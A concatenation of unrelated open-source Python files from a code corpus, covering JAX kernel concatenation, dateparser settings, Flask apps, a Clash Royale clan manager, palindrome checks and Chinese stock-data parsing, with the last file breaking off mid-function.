      `nngp.shape == (batch_size_1, batch_size_2, height, height,
      width, width, depth, depth, ...)`).
    widths: list of integer channel widths of the finite model inputs.

  Returns:
    New `jnp.ndarray` representing covariance between concatenated activations.
  """
  if mats[0] is None:
    return None
  n_mats = len(mats)
  mat_ndim = mats[0].ndim
  # Averaging if concatenating along features or diagonalized dimension.
  if axis == -1:
    # Channelwise concatenation mixes channels, so kernels combine as a
    # width-weighted average (uniform weights when all widths are equal).
    if all(w == widths[0] for w in widths):
      widths = [1] * len(widths)
    mat = sum(mats[i] * widths[i] for i in range(n_mats)) / sum(widths)
  # Simple concatenation along the axis if the axis is not duplicated.
  elif ((axis == 0 and diagonal_batch) or
        (axis != 0 and diagonal_spatial)):
    concat_axis = axis + (0 if diagonal_batch else 1)
    mat = jnp.concatenate(mats, concat_axis)
  # 2D concatenation with insertion of 0-blocks if the axis is present twice.
  else:
    # Different inputs are independent, so the combined covariance is
    # block-diagonal: each `mat` is zero-padded to its block position along
    # `pad_axis`, and the rows are concatenated along the paired axis.
    rows = []
    pad_axis = max(0, 2 * axis - (1 if diagonal_batch else 0))
    for i, mat in enumerate(mats):
      pads = [(0, 0)] * mat_ndim
      pads[pad_axis] = (
          sum(mats[j].shape[pad_axis] for j in range(i)),
          sum(mats[j].shape[pad_axis] for j in range(i + 1, n_mats))
      )
      rows.append(jnp.pad(mat, pads))
    mat = jnp.concatenate(rows, pad_axis + 1)
  return mat
| google/neural-tangents | neural_tangents/_src/stax/branching.py | branching.py | py | 15,516 | python | en | code | 2,138 | github-code | 90 |
# Default dateparser settings; see the dateparser documentation for the
# meaning of each key. (The original first line was corrupted by a stray
# numeric artifact, which made the file a syntax error.)
settings = {
    'PREFER_DATES_FROM': 'current_period',
    'SUPPORT_BEFORE_COMMON_ERA': False,
    'PREFER_DAY_OF_MONTH': 'current',
    'SKIP_TOKENS': ["t"],
    'SKIP_TOKENS_PARSER': ["t", "year", "hour", "minute"],
    'TIMEZONE': 'local',
    'TO_TIMEZONE': False,
    'RETURN_AS_TIMEZONE_AWARE': 'default',
    'NORMALIZE': True,
    'RELATIVE_BASE': False,
    'DATE_ORDER': 'MDY',
    'PREFER_LOCALE_DATE_ORDER': True,
    'FUZZY': False,
    'STRICT_PARSING': False,
}
| Raghav-Pal/PythonAutomationFramework_1 | venv/Lib/site-packages/dateparser_data/settings.py | settings.py | py | 477 | python | gu | code | 12 | github-code | 90 |
15900215915 | #!/usr/bin/python3
"""Module for matrix divided method"""
def matrix_divided(matrix, div):
    """Divide all elements of a matrix by div, rounded to 2 decimal places.

    Args:
        matrix: a non-empty list of non-empty lists of integers/floats.
        div: a non-zero number (int or float).

    Returns:
        A new matrix with each element divided by div.

    Raises:
        TypeError: if matrix is not a list of lists of ints/floats, if the
            rows differ in size, or if div is not a number.
        ZeroDivisionError: if div is 0.
    """
    if type(div) is not int and type(div) is not float:
        raise TypeError("div must be a number")
    if div == 0:
        raise ZeroDivisionError("division by zero")
    if type(matrix) is not list or len(matrix) == 0:
        raise TypeError(
            "matrix must be a matrix "
            "(list of lists) of integers/floats"
        )
    new_matrix = []
    row_len = None
    for row in matrix:
        # Bug fix: the original tested len(matrix[0]) here, so an empty row
        # anywhere other than position 0 was never rejected by this check.
        if type(row) is not list or len(row) == 0:
            raise TypeError(
                "matrix must be a matrix "
                "(list of lists) of integers/floats"
            )
        if row_len is None:
            row_len = len(row)
        # Bug fix: compare with != instead of `is not` -- identity checks on
        # ints only hold inside CPython's small-int cache (-5..256), so
        # equal-length rows longer than 256 raised a spurious error.
        if row_len != len(row):
            raise TypeError("Each row of the matrix must have the same size")
        new_row = []
        for x in row:
            if type(x) is not int and type(x) is not float:
                raise TypeError(
                    "matrix must be a matrix "
                    "(list of lists) of integers/floats"
                )
            new_row.append(round(x / div, 2))
        new_matrix.append(new_row)
    return new_matrix
| nerraou/alx-higher_level_programming | 0x07-python-test_driven_development/2-matrix_divided.py | 2-matrix_divided.py | py | 1,291 | python | en | code | 0 | github-code | 90 |
class Stat():
    """Track game statistics and the persistent high score."""

    def __init__(self, setg):
        """Initialise statistics from settings `setg` (needs `ships_limit`)."""
        self.setg = setg
        self.active_game = False
        # Bug fix: the original used `int(file.read()) if file else 0`, but a
        # file object is always truthy, so an empty highscore.txt crashed on
        # int('') and a missing file raised FileNotFoundError.
        try:
            with open('highscore.txt') as file:
                content = file.read().strip()
            self.high_score = int(content) if content else 0
        except (OSError, ValueError):
            # Missing, unreadable or corrupt file: start with no high score.
            self.high_score = 0
        self.reset_stats()

    def reset_stats(self):
        """Reset the per-game statistics (called at the start of each game)."""
        self.ships_left = self.setg.ships_limit
        self.score = 0
        self.level = 1
| prgup/space_invader | statics.py | statics.py | py | 300 | python | en | code | 1 | github-code | 90 |
11206125484 | from sys import exit
from decouple import config
from config import config_dict
from app import create_app, celery
# Debug flag read from the environment (defaults to True).
DEBUG = config('DEBUG', default=True, cast=bool)
# The configuration
get_config_mode = 'Debug' if DEBUG else 'Production'
try:
    # Load the configuration using the default values
    app_config = config_dict[get_config_mode.capitalize()]
except KeyError:
    exit('Error: Invalid <config_mode>. Expected values [Debug, Production] ')
# Re-export the Celery instance at module level -- presumably so workers can
# be started with `celery -A run.celery`; confirm against deployment scripts.
celery = celery
app = create_app(app_config)
# Push an application context so code importing this module (e.g. Celery
# tasks) can use Flask extensions outside a request.
app.app_context().push()
if __name__ == "__main__":
    app.run()
| diegozarur/webscanner | run.py | run.py | py | 569 | python | en | code | 1 | github-code | 90 |
18651208898 | from show_data import *
import numpy as np
def metric_comparison(st):
    """Render a line chart comparing average ndcg/bleu/rouge per turn.

    Loads the combined results CSV, keeps only automatic runs of the base
    T5 query rewriter, prints the pairwise Pearson correlations of the
    per-turn metric averages and plots all three metrics over turns 1-12.
    (Also repairs the original final line, which was corrupted by stray
    metadata and made the file a syntax error.)

    Args:
        st: the streamlit module (or compatible object) used for output.
    """
    df = pd.read_csv(get_route("all"))
    df = df[df['T5_query_rewriter'] == "base"]
    df = df[df['run_type'] == "automatic"]
    df = df.drop(['Id', 'Creation Time', 'T5_query_rewriter', 'run_type'], axis=1)
    metrics_dict = {
        'average_ndcg': get_average_ndcg_per_turn(df),
        'average_bleu': get_average_bleu_per_turn(df),
        'average_rouge': get_average_rouge_per_turn(df)
    }
    st.subheader("Graph showing the comparison between different metrics at different turns")
    # Pairwise correlations; labels and order match the original output.
    for label, a, b in (
            ("rouge and bleu", 'average_bleu', 'average_rouge'),
            ("bleu and ndcg", 'average_bleu', 'average_ndcg'),
            ("rouge and ndcg", 'average_rouge', 'average_ndcg')):
        st.write("The correlation between " + label + " is :" +
                 str(np.corrcoef(metrics_dict[a], metrics_dict[b])[0, 1]))
    x = list(range(1, 13))  # turns 1..12
    fig = go.Figure()
    for name in ('average_ndcg', 'average_bleu', 'average_rouge'):
        fig.add_trace(go.Scatter(x=x, y=metrics_dict[name], mode='lines',
                                 name=name + "_per_turn"))
    fig.update_layout(legend=dict(orientation="h", yanchor="bottom", y=1.02, xanchor="right", x=1), width=1000, height=600)
    st.plotly_chart(fig, use_container_width=False, sharing="streamlit")
7983916988 | import pytest
import math
import time
class Solution(object):
    def valid_palindrome_SS(self, str):
        """Return True if `str` reads the same forwards and backwards over
        its alphanumeric characters, ignoring case.

        Bug fix: the original only compared characters when the filtered
        string had even length, so it fell through and returned None
        (not True) for odd-length palindromes such as "racecar".
        """
        filtered = [c.lower() for c in str if c.isalnum()]
        # Compare mirrored pairs; the middle character of an odd-length
        # string needs no check.
        for i in range(len(filtered) // 2):
            if filtered[i] != filtered[-1 - i]:
                return False
        return True

    def valid_palindrome_neat(self, s):
        """Two-pointer variant: O(n) time, O(1) extra space."""
        l, r = 0, len(s) - 1
        while l < r:
            # Skip non-alphanumeric characters from both ends.
            while l < r and not self.alphanum(s[l]):
                l += 1
            while l < r and not self.alphanum(s[r]):
                r -= 1
            if s[l].lower() != s[r].lower():
                return False
            l += 1
            r -= 1
        return True

    def alphanum(self, c):
        """ASCII-only alphanumeric test (narrower than str.isalnum, which
        also accepts non-ASCII Unicode letters and digits)."""
        return (
            ord("A") <= ord(c) <= ord("Z")
            or ord("a") <= ord(c) <= ord("z")
            or ord("0") <= ord(c) <= ord("9")
        )
# Guide for solutions:
# Solution 1: filter the string, then compare it with its reverse (str[::-1])
#   -- O(n) time, but several extra passes and O(n) extra memory.
# Solution 2: two pointers (left and right) -- O(n) time, O(1) extra memory.
# Golden rule: prefer the constant-memory two-pointer approach.
70993434536 | # Clash Royale Clan Manager
# computes promotion/demotion/kick/warning lists, average war rank, and weekly war champ according to clan wars II statistics
# uses data from Supercell's Clash Royale API
import json
import requests
import statistics
def data_fetcher(clan_tag, token, category):
    """Fetch one `category` of clan data from Supercell's Clash Royale API.

    Known categories: currentriverrace, riverracelog, warlog, members,
    members?limit=50, or an empty string for the basic clan info.

    Args:
        clan_tag: clan tag including the leading '#'.
        token: API bearer token.
        category: endpoint suffix to query.

    Returns:
        The decoded JSON response body.
    """
    headers = {
        'Accept': 'application/json',
        'authorization': 'Bearer ' + token,
    }
    # The leading '#' must appear percent-encoded (%23) in the URL path.
    encoded_tag = '%23' + clan_tag[1:]
    url = "https://api.clashroyale.com/v1/clans/" + encoded_tag + '/' + category
    response = requests.request("GET", url, headers=headers)
    return response.json()
def ClashRoyaleClanManager(clan_tag, token, data_fetched):
    """Compute promotion/demotion/kick/warning lists, the average war rank
    and the weekly war champ from the clan's river-race history.

    Args:
        clan_tag: clan tag including the leading '#'.
        token: API bearer token (unused when data_fetched is True).
        data_fetched: if True, read cached JSON from logs/ instead of the API.

    Returns:
        (week_champ, promotion_list, demotion_list, kick_list, warning_list).
    """
    # fetch and log data
    if data_fetched:
        with open('logs/members.json', 'r') as outfile:
            members = json.load(outfile)
        with open('logs/riverracelog.json', 'r') as outfile:
            riverracelog = json.load(outfile)
    else:
        print('Fetching members data...')
        members = data_fetcher(clan_tag, token, 'members')
        with open('logs/members.json', 'w') as outfile:
            json.dump(members, outfile)
        print('Fetching riverracelog data...')
        riverracelog = data_fetcher(clan_tag, token, 'riverracelog')
        with open('logs/riverracelog.json', 'w') as outfile:
            json.dump(riverracelog, outfile)
    # Identify the two most recent war weeks by their "seasonId:sectionIndex".
    # NOTE(review): max() compares these *strings* lexicographically, which
    # misorders once seasonId gains a digit (e.g. "100:.." < "99:..") --
    # confirm whether a numeric sort is needed.
    race_indices = [f"{war_week['seasonId']}:{war_week['sectionIndex']}" for war_week in riverracelog['items']]
    last_race = str(max(race_indices))
    race_indices.remove(last_race)
    second_last_race = str(max(race_indices))
    # tags of current members
    member_tags = [member['tag'] for member in members['items']]
    # init dictionary to store the clan log
    clan_log = {}
    clan_log['ranks'] = []
    # init fame entries for every current member
    for member in members['items']:
        clan_log[member['tag']] = {'name':member['name'], 'role':member['role'], 'fame':{}}
    name_to_tag = {clan_log[key]['name']:key for key in clan_log if key != 'ranks'}
    # create clan history
    for war_week in riverracelog['items']:
        # each war week is marked uniqely with "seasonId:sectionIndex"
        week_id = f"{war_week['seasonId']}:{war_week['sectionIndex']}"
        # locate clan entry
        for entry in war_week['standings']:
            if entry['clan']['tag'] == clan_tag:
                clan_data = entry
        # add week data to clan_log (ex-members are skipped)
        for member in clan_data['clan']['participants']:
            if member['tag'] in member_tags:
                clan_log[member['tag']]['fame'][week_id] = member['fame']
        clan_log['ranks'].append(clan_data['rank'])
    print(f"Average war rank: {statistics.mean(clan_log['ranks'])}")
    # compute week champ: highest fame in the latest war week
    week_fame = [(clan_log[key]['name'], clan_log[key]['fame'][last_race]) for key in clan_log if key != 'ranks' and last_race in clan_log[key]['fame']]
    week_fame.sort(key = lambda x: x[1])
    week_champ = week_fame.pop()
    # check for multiple champs (ties collapse into a list)
    max_score = week_champ[1]
    if week_fame[-1][1] == max_score:
        week_champ = [week_champ, week_fame.pop()]
        while week_fame[-1][1] == max_score:
            week_champ.append(week_fame.pop())
    # status update lists, built from members present in both recent weeks
    last_two_weeks_fame = [(clan_log[key]['name'], clan_log[key]['role'], clan_log[key]['fame'][last_race], clan_log[key]['fame'][second_last_race]) for key in clan_log if key != 'ranks' and last_race in clan_log[key]['fame'] and second_last_race in clan_log[key]['fame']]
    kick_list = []
    demotion_list = []
    promotion_list = []
    warning_list = []
    for item in last_two_weeks_fame:
        role = item[1]
        last_week_fame = item[2]
        second_last_week_fame = item[3]
        # promotion rule: two consecutive weeks of at least 1600 fame in war
        if last_week_fame > 1600 and second_last_week_fame > 1600 and role == 'member':
            promotion_list.append(item)
        # warning rule: less than losing all attacks in 3/4 days in the last war
        if last_week_fame < 1200:
            warning_list.append(item)
        # demotion rule (elders): less than 1600 for two consecutive weeks
        if last_week_fame < 1600 and second_last_week_fame < 1600 and role == 'elder':
            demotion_list.append(item)
        # kick rule: total score for two consecutive weeks is below 3200,
        # i.e. less than two full weeks of losing all attacks in 4/4 days
        # (1600 + 1600)
        if last_week_fame + second_last_week_fame < 3200 and role == 'member':
            kick_list.append(item)
    print('\nfull war history of members in kick list:')
    for item in kick_list:
        name = item[0]
        print(f"{name}: {clan_log[name_to_tag[name]]['fame']}")
    print("\n")
    with open("logs/clan-log.json", "w") as outfile:
        json.dump(clan_log, outfile)
    return week_champ, promotion_list, demotion_list, kick_list, warning_list
## customizations: edit only this part of the code to adapt it to your clan
clan_tag = input("insert clan tag (starting with #): ")
# key created via supercell's CR api
token = input("insert token from Supercell's Clash Royale API: ")
# set to True to compute the output from the local log files instead of the API
data_fetched = False
week_champ, promotion_list, demotion_list, kick_list, warning_list = ClashRoyaleClanManager(clan_tag, token, data_fetched)
# (The original final line was corrupted by stray trailing metadata, which
# made the file a syntax error.)
print(f"Week champ: {week_champ} \nPromote: {promotion_list} \nDemote: {demotion_list} \nKick: {kick_list} \nwarning list: {warning_list}")
42384301415 | import os
from werkzeug.utils import secure_filename
from BismarkPusher import BismarkPusher
from FlaskHelpers import FlaskHelpers
from flask import Flask, url_for, render_template
from flask import request
from flask_cors import CORS
from report_processor.bismarck_report import BismarckReport
from models.Results import Results
from rosetta.rosetta_config import RosettaConfig
import rollbar
import rollbar.contrib.flask
from flask import got_request_exception
import yaml
# Flask app serving the built frontend assets from /dist.
app = Flask(__name__, static_url_path='/dist')
# NOTE(review): CORS is wide open (any origin on any route) -- confirm this
# is intended for production.
cors = CORS(app, resources={r"/*": {"origins": "*"}})
flask_helpers = FlaskHelpers()
@app.before_first_request
def init_rollbar():
    """Initialise Rollbar error reporting from rollbar.yml (runs once).

    Bug fixes: the YAML file handle was never closed, ``yaml.load`` without
    an explicit Loader is removed in PyYAML >= 6 (and unsafe before that),
    and the settings -- including the access token -- were printed to stdout.
    """
    with open(os.getcwd() + "/rollbar.yml") as stream:
        rollbar_settings = yaml.safe_load(stream)
    rollbar.init(
        # access token for the demo app: https://rollbar.com/demo
        rollbar_settings['key'],
        # environment name
        rollbar_settings['env'],
        # server root directory, makes tracebacks prettier
        root=os.path.dirname(os.path.realpath(__file__)),
        # flask already sets up logging
        allow_logging_basic_config=False)
    # send exceptions from `app` to rollbar, using flask's signal system.
    got_request_exception.connect(rollbar.contrib.flask.report_exception, app)
@app.route("/")
def index():
return flask_helpers.message('woops... It seems that you got the wrong place', 404)
@app.route("/upload", methods=['POST'])
def upload():
for file in dict(request.files):
current_file = request.files[file]
# Todo: handle when a file already exists.
path = os.getcwd() + '/uploads/' + secure_filename(current_file.filename)
current_file.save(path)
return flask_helpers.response(response={'file': path})
@app.route("/process_files", methods=['POST'])
def process():
parsed_request = dict(request.form)
# A couple of validations.
if 'files' not in parsed_request.keys():
return flask_helpers.error('The files property is empty.')
if 'room' not in parsed_request.keys():
return flask_helpers.error('You need to provide the pusher room.')
if parsed_request['files'] is None:
return flask_helpers.error('The files object is empty.')
# Init variables.
pusher = BismarkPusher(parsed_request['room'])
reports = {}
for file in parsed_request['files'][0].split(","):
if file == '':
continue
# Get the file name.
file_split = file.split('/')
file_name = file_split[-1]
# Notify the user we started to process.
pusher.send_message(event='processing_file', message=file_name)
# Check out the new api to bismark report
b_report = BismarckReport(report_file_name=file)
b_report.process_book()
reports[file_name] = b_report.get_compact()
# Saving the results inside the DB.
results = Results()
document = results.insert({'results': reports})
# Done!
# pusher.send_message(event='done', message=document)
return flask_helpers.response(response={'data': document})
@app.route("/process_files/<id>", methods=['GET'])
def process_files_results(id):
"""
Return the results for process files.
:param id:
The ID of the process.
:return:
The object in the DB.
"""
results = Results()
return flask_helpers.response(results.load(id))
@app.route("/metadata", methods=['GET'])
def metadata():
rosetta = RosettaConfig()
return flask_helpers.response({
'fields': flask_helpers.flip_dict(rosetta.FIELDS_LIST),
'instruments': flask_helpers.flip_dict(rosetta.INSTRUMENT_DICT)
})
| RoySegall/BismarckValidator | app.py | app.py | py | 3,743 | python | en | code | 1 | github-code | 90 |
11623078255 | ############################################################
# #
# Author: Adrian T. Neumann #
# Date: 11 November 2018 #
# Description: A program that accepts the number #
# of hours worked on each of five work days from the #
# user, then displays different information calculated #
# about those entries as output. #
# #
############################################################
# Compute number of days at work
def NonZeroHours(in_hours):
    """Return how many entries of in_hours are non-zero (days actually worked)."""
    # Idiomatic count via a generator instead of a manual counter loop.
    return sum(1 for hours in in_hours if hours != 0)
def CalulateTotalHours(in_hours):
    """Return the total number of hours worked.

    Generalized: the original hard-coded range(5) and raised IndexError for
    shorter lists; summing the whole sequence gives the same result for
    five-day input while supporting any length.
    """
    return sum(in_hours)
# Calculate the maximum number of hours worked on any single day
def CalculateMaxHours(in_hours):
    """Return the largest entry in in_hours.

    Uses max() directly instead of sorting a copy (O(n) instead of
    O(n log n), no temporary list). Raises ValueError on an empty list.
    """
    return max(in_hours)
# Validate the daily hours worked
def CollectHoursWorked(in_message):
    """Prompt with in_message until a whole number of hours (0-24) is entered.

    Bug fixed: the original called int() on the raw input before verifying
    it was numeric, so any non-digit entry crashed with ValueError instead
    of re-prompting.
    """
    while True:
        NumberString = input(in_message)
        # isdigit() rejects signs, decimals and text, so int() below is safe.
        if not NumberString.isdigit():
            continue
        Number = int(NumberString)
        # Only values that fit within a 24-hour day are accepted.
        if 0 <= Number <= 24:
            return Number
def main():
    """Interactively collect five days of hours and print a summary report.

    Repeats until the user enters anything other than 'y'/'Y' at the
    continue prompt. Relies on CollectHoursWorked for input validation and
    on the Calculate* helpers for the statistics.
    """
    # Main program loop flag
    DoYouWantToContinue = "Y"
    NumberOfDays = 5
    while DoYouWantToContinue == "Y":
        # Variables and Input
        HoursWorked = []
        # NOTE(review): SortedHoursWorked and DaysMaximumHoursWorked are
        # initialized but never used below.
        SortedHoursWorked = []
        MaximumHoursWorked = 0
        DaysMaximumHoursWorked = 0
        DayOne = ""
        DayTwo = ""
        DayThree = ""
        DayFour = ""
        DayFive = ""
        # Collect hours worked on each of five workdays
        HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #1: " ))
        HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #2: " ))
        HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #3: " ))
        HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #4: " ))
        HoursWorked.append(CollectHoursWorked( "Enter hours worked on Day #5: " ))
        # Processing
        # Calculate maximum hours, total hours, days actually worked, and average hours
        MaximumHoursWorked = CalculateMaxHours(HoursWorked)
        TotalHours = CalulateTotalHours(HoursWorked)
        #DaysWorked = NonZeroHours(HoursWorked)
        AverageHours = TotalHours / NumberOfDays
        Day = []
        # Calculate the days when the maximum hours were worked
        # (non-max days get "" so the format string leaves blanks for them)
        for days in range(NumberOfDays):
            if HoursWorked[days] == MaximumHoursWorked:
                Day.append(days + 1)
            else:
                Day.append("")
        # Assign maximum workload days to individual variable for output formatting
        DayOne,DayTwo,DayThree,DayFour,DayFive = Day
        SlackDay = []
        # Calculate slackdays (days with fewer than 7 hours worked)
        for days in range(NumberOfDays):
            if HoursWorked[days] < 7:
                SlackDay.append(days + 1)
        # Output
        print("--------------------------------------------------------------------------")
        print("The most hours worked was on: ")
        print("Day(s)# {0} {1} {2} {3} {4} when you worked {5} hours.".format(DayOne,DayTwo,DayThree,DayFour,DayFive,MaximumHoursWorked))
        print("--------------------------------------------------------------------------")
        print("The total number of hours worked was: {0} ".format(TotalHours))
        print("The average number of hours worked on each day was: {0} ".format(AverageHours))
        print("------------------------------------------------------------------------- ")
        print("Days you slacked off (i.e. worked less than 7 hours):")
        # Print slack days
        for days in SlackDay:
            print('Day #',days,':',HoursWorked[days-1],'hours')
        DoYouWantToContinue = input("Enter 'y' to continue: ").upper()
if __name__ == "__main__":
main()
| Bach9000/prog1015_an | Assignments/Assignemnt 3/Program 1- Time Sheet.py | Program 1- Time Sheet.py | py | 4,597 | python | en | code | 0 | github-code | 90 |
17980484222 |
from functools import wraps
from flask import make_response, abort
from app.models.customer import Customer
from app.models.video import Video
def validate_endpoint(endpoint):
    """Decorator to validate that endpoint id is an int. Returns JSON and
    400 if not an int, 404 if the record does not exist.

    Recognizes a ``customer_id`` or ``video_id`` keyword argument, resolves
    it to a model instance, and passes it on as ``customer=`` / ``video=``.
    Fixes: the customer and video branches were copy-pasted duplicates
    (now table-driven), the bare ``except`` swallowed everything (narrowed
    to TypeError/ValueError from int()), and the dict key used a pointless
    f-string prefix. Also repairs the corrupted final line.
    """
    # (id kwarg name, model class, label for messages, kwarg passed onward)
    _RESOURCES = (
        ("customer_id", Customer, "Customer", "customer"),
        ("video_id", Video, "Video", "video"),
    )

    @wraps(endpoint)  # Makes fn look like func to return
    def fn(*args, **kwargs):
        """Validates id for endpoint is an integer and resolves the record."""
        for id_key, model, label, target_kwarg in _RESOURCES:
            if id_key not in kwargs:
                continue
            resource_id = kwargs.pop(id_key)
            try:
                int(resource_id)
            except (TypeError, ValueError):
                abort(make_response({"details": f"{resource_id} must be an int."}, 400))
            record = model.query.get(resource_id)
            if not record:
                abort(make_response({"message" :f"{label} {resource_id} was not found"}, 404))
            kwargs[target_kwarg] = record
            return endpoint(*args, **kwargs)
        # Neither id kwarg present: same implicit-None behavior as before.
        return None
    return fn
# -*- coding: utf-8 -*-
# Fix: dataset sequence-id junk was fused onto the first line of this file.
import sys
sys.setrecursionlimit(10**9)
INF=10**18
MOD=10**9+7
input=lambda: sys.stdin.readline().rstrip()
YesNo=lambda b: bool([print('Yes')] if b else print('No'))
YESNO=lambda b: bool([print('YES')] if b else print('NO'))
int1=lambda x:int(x)-1
def main():
    """Keep ingredient totals in ratio T:A through N steps.

    At each step, scale the new pair (t, a) by the smallest multiple that
    covers the running totals; -(-x // y) is ceiling division.
    """
    N=int(input())
    T,A=map(int,input().split())
    for _ in range(N-1):
        t,a=map(int,input().split())
        res=max(-(-T//t),-(-A//a))
        T,A=t*res,a*res
    print(T+A)
if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p03964/s796893815.py | s796893815.py | py | 512 | python | en | code | 0 | github-code | 90 |
# -*- coding: utf-8 -*-
"""
本程序用通达信数据对股价前复权,将数据保存为excel文件
通达信本地数据格式:
每32个字节为一个5分钟数据,每字段内低字节在前
00 ~ 01 字节:日期,整型,设其值为num,则日期计算方法为:
year=floor(num/2048)+2004;
month=floor(mod(num,2048)/100);
day=mod(mod(num,2048),100);
02 ~ 03 字节: 从0点开始至目前的分钟数,整型
04 ~ 07 字节:开盘价*100,整型
08 ~ 11 字节:最高价*100,整型
12 ~ 15 字节:最低价*100,整型
16 ~ 19 字节:收盘价*100,整型
20 ~ 23 字节:成交额*100,float型
24 ~ 27 字节:成交量(股),整型
28 ~ 31 字节:(保留)
每32个字节为一天数据
每4个字节为一个字段,每个字段内低字节在前
00 ~ 03 字节:年月日, 整型
04 ~ 07 字节:开盘价*100, 整型
08 ~ 11 字节:最高价*100, 整型
12 ~ 15 字节:最低价*100, 整型
16 ~ 19 字节:收盘价*100, 整型
20 ~ 23 字节:成交额(元),float型
24 ~ 27 字节:成交量(股),整型
28 ~ 31 字节:(保留)
读取需要加载struct模块,unpack之后得到一个元组。
日线读取:
fn=r"code.day";
fid=open(fn,"rb");
list=fid.read(32)
ulist=struct.unpack("iiiiifii", list)
5分钟线读取也是一样。
"""
import os
import sys
import struct
import datetime
import numpy as np
import pandas as pd
import winreg
import sqlite3
def createDataBase(db_path='d:\\hyb\\STOCKDATA.db'):
    """Create the GJ price table and its unique index if missing.

    Column meanings (translated from the original Chinese notes):
    GPDM stock code, RQ trade date, OPEN/HIGH/LOW/CLOSE prices,
    AMOUT turnover (1e8 yuan), VOLUME volume (1e4 shares), RATE change,
    PRE_CLOSE previous close, ADJ_RATE/ADJ_CLOSE forward-adjusted
    change/close. (GPDM, RQ) forms the unique key.

    :param db_path: SQLite database file; default kept as the historical
        hard-coded path so existing ``createDataBase()`` calls still work.

    Fixes: the connection was never committed or closed (leak), and the
    database path was hard-coded.
    """
    cn = sqlite3.connect(db_path)
    try:
        cn.execute('''CREATE TABLE IF NOT EXISTS GJ
               (GPDM TEXT  NOT NULL,
               RQ TEXT NOT NULL,
               OPEN REAL NOT NULL DEFAULT (0.00),
               HIGH REAL NOT NULL DEFAULT (0.00),
               LOW REAL NOT NULL DEFAULT (0.00),
               CLOSE REAL NOT NULL DEFAULT (0.00),
               AMOUT REAL NOT NULL DEFAULT (0.00),
               VOLUME REAL NOT NULL DEFAULT (0.00),
               RATE REAL NOT NULL DEFAULT (0.00),
               PRE_CLOSE REAL NOT NULL DEFAULT (0.00),
               ADJ_RATE REAL NOT NULL DEFAULT (0.00),
               ADJ_CLOSE REAL NOT NULL DEFAULT (0.00));''')
        cn.execute('''CREATE UNIQUE INDEX IF NOT EXISTS GPDM_RQ_GJ ON GJ(GPDM,RQ);''')
        cn.commit()
    finally:
        cn.close()
##########################################################################
#将字符串转换为时间戳,不成功返回None
##########################################################################
def str2datetime(s):
    """Parse the leading 'YYYYMMDD' of a string into a datetime; None on failure."""
    try:
        year, month, day = int(s[:4]), int(s[4:6]), int(s[6:8])
        return datetime.datetime(year, month, day)
    except Exception:
        return None
###############################################################################
#将通达信.day读入pands
###############################################################################
def day2pd(dayfn,start=None,end=None):
    """Parse a TDX .day file into a DataFrame indexed by trade date.

    Each 32-byte record is unpacked per the file-header layout documented
    at the top of this module: date, open, high, low, close (x100),
    turnover (float), volume, and a reserved field. Prices are rescaled to
    yuan, turnover to 1e8 yuan, volume to 1e4 shares, and a day-over-day
    change rate is derived from the previous close.

    :param dayfn: path of the binary .day file
    :param start,end: optional 'YYYYMMDD' strings; when both parse, the
        frame is sliced to [start:end], otherwise the full frame is returned
    """
    columns = ['rq','date','open', 'high', 'low','close','amout','volume','rate','pre_close','adj_rate','adj_close']
    with open(dayfn,"rb") as f:
        data = f.read()
        f.close()  # redundant inside `with`, kept as-is
    days = int(len(data)/32)  # one 32-byte record per trading day
    records = []
    qsp = 0  # previous close ("qian shou pan"); 0 until the first record
    for i in range(days):
        dat = data[i*32:(i+1)*32]
        rq,kp,zg,zd,sp,cje,cjl,tmp = struct.unpack("iiiiifii", dat)
        rq1 = str2datetime(str(rq))
        rq2 = rq1.strftime("%Y-%m-%d")
        kp = kp/100.00
        zg = zg/100.00
        zd = zd/100.00
        sp = sp/100.00
        cje = cje/100000000.00 # 1e8 yuan
        cjl = cjl/10000.00 # 1e4 shares
        # Change rate vs previous close; 0.0 for the first row or a zero close.
        zf = sp/qsp-1 if (i>0 and qsp>0) else 0.0
        # adj_rate/adj_close start equal to rate/close; adj_close() rewrites them.
        records.append([rq1,rq2,kp,zg,zd,sp,cje,cjl,zf,qsp,zf,sp])
        qsp = sp
    df = pd.DataFrame(records,columns=columns)
    df = df.set_index('rq')
    start = str2datetime(start)
    end = str2datetime(end)
    if start == None or end==None :
        return df
    else :
        return df[start:end]
########################################################################
#获取本机通达信安装目录,生成自定义板块保存目录
########################################################################
def gettdxdir():
    """Look up the TDX client ("华西证券华彩人生") install directory in the
    Windows registry; exits the program when the software is not installed.

    Fixes: the bare ``except`` hid unrelated failures (narrowed to OSError,
    which covers winreg's FileNotFoundError), and the local name ``type``
    shadowed the builtin.
    """
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\华西证券华彩人生")
        value, value_type = winreg.QueryValueEx(key, "InstallLocation")
    except OSError:
        print("本机未安装【华西证券华彩人生】软件系统。")
        sys.exit()
    return value
###############################################################################
#将通达信.day读入pands
###############################################################################
def tdxday2pd(gpdm,start=None,end=None):
    """Load one stock's daily bars from the local TDX install into a DataFrame.

    Returns [] when the stock has no local .day file.
    """
    code = sgpdm(gpdm)
    market = 'sh' if code[0] == '6' else 'sz'
    day_file = gettdxdir() + '\\vipdoc\\' + market + '\\lday\\' + market + code + '.day'
    if not os.path.exists(day_file):
        return []
    return day2pd(day_file, start, end)
###############################################################################
#将分红数据读入pands
###############################################################################
def fhsql2pd(gpdm):
    """Load dividend (fh) rows for one stock into a date-indexed DataFrame.

    Columns: gqdjr (record date, 'YYYYMMDD'), fh (cash dividend),
    szg (bonus-share ratio); indexed by the parsed record date.
    """
    code = lgpdm(gpdm)
    conn = sqlite3.connect('d:\\hyb\\STOCKDATA.db')
    sql = "select rq as gqdjr,fh,szg from fh where gpdm=='" + code + "';"
    frame = pd.read_sql_query(sql, con=conn)
    conn.close()
    frame['gqdjr'] = frame['gqdjr'].map(lambda x: x.replace('-', ''))
    frame['date'] = frame['gqdjr'].map(str2datetime)
    return frame.set_index('date')
###############################################################################
#将配股数据读入pands
###############################################################################
def pgsql2pd(gpdm):
    """Load rights-issue (pg) rows for one stock into a date-indexed DataFrame.

    Columns: gqdjr (record date, 'YYYYMMDD'), pgj (issue price),
    pgbl (issue ratio); indexed by the parsed record date.
    """
    code = lgpdm(gpdm)
